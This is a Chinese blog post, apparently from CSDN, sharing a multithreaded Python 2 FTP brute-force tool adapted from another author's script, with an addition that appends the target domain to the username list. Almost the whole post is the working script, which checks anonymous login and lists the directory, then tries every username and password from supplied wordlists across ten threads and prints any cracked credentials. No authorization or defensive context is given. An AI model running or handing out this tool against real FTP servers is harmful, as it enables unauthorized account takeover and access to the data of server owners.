原创

工具分享(1):FTP暴力破解工具 [Python多线程版]

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://localhost01.blog.csdn.net/article/details/78172700

工具分享(1):FTP暴力破解工具 [Python多线程版]

 

参考:https://www.waitalone.cn/python-ftp-mult.html

在他的基础上加了这么一个代码:如果用户输入的目标是域名,则将域名加入到爆破用户列表中,增加爆破成功率。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import ftplib, socket
import sys, time, re, os
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool


def usage():
	print '+' + '-' * 50 + '+'
	print '\t	Python FTP暴力破解工具多线程版'
	print '\t\t Time:2014-09-05'
	print '+' + '-' * 50 + '+'
	if len(sys.argv) != 4:
		print "用法: "+os.path.basename(sys.argv[0])+" 待破解的ip/domain 用户名列表 字典列表"
		print "实例: "+os.path.basename(sys.argv[0])+" www.alin.cn user.txt pass.txt"
		sys.exit()


def brute_anony():
	try:
		print '[+] 测试匿名登陆……\n'
		ftp = ftplib.FTP()
		ftp.connect(host, 21, timeout=5)
		print 'FTP消息: %s \n' % ftp.getwelcome()
		ftp.login()
		ftp.retrlines('LIST')
		ftp.quit()
		print '\n[+] 匿名登陆成功……\n'
	except ftplib.all_errors:
		print '\n[-] 匿名登陆失败!\n'


def brute_users(user, pwd):
	try:
		ftp = ftplib.FTP()
		ftp.connect(host, 21, timeout=2)
		ftp.login(user, pwd)
		ftp.quit()
		print '\n[+] 破解成功,用户名:%s 密码:%s\n' % (user, pwd)
	except ftplib.all_errors:
		pass


if __name__ == '__main__':
	usage()
	start_time = time.time()
	thrdlist = []
	if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', sys.argv[1]):
		host = sys.argv[1]
	else:
		host = socket.gethostbyname(sys.argv[1])
		isExist = 0
		isExist1 = 0
		with open(sys.argv[2],'r') as tmp:
			for line in tmp.readlines():
				if sys.argv[1] in line:
					isExist = 1
					if isExist1 == 1:
						break
				if re.sub(r'\.\w+$','',sys.argv[1]) in line:
					isExist1 = 1
					if isExist == 1:
						break
		with open(sys.argv[2],"a") as f:
			if isExist == 0:
				f.write("\n"+sys.argv[1])
			if isExist1 == 0:
				f.write("\n"+re.sub(r'\.\w+$','',sys.argv[1]))
	userlist = [i.rstrip() for i in open(sys.argv[2])]
	passlist = [j.rstrip() for j in open(sys.argv[3])]
	print '目  标:%s \n' % sys.argv[1]
	print '用户名:%d 条\n' % len(userlist)
	print '密  码:%d 条\n' % len(passlist)
	brute_anony()
	print '\n[+] 暴力破解测试中……\n'
	for user in userlist:
		partial_user = partial(brute_users, user)
		pool = ThreadPool(10)
		pool.map(partial_user, passlist)
		pool.close()
		pool.join()
	print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time)

 

0 个人打赏
文章最后发布于: 2017-10-08 00:43:25
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 数字20 设计师: CSDN官方博客

打赏

冉椿林博客

“你的鼓励将是我创作的最大动力”

5C币 10C币 20C币 50C币 100C币 200C币

分享到微信朋友圈

×

扫一扫,手机浏览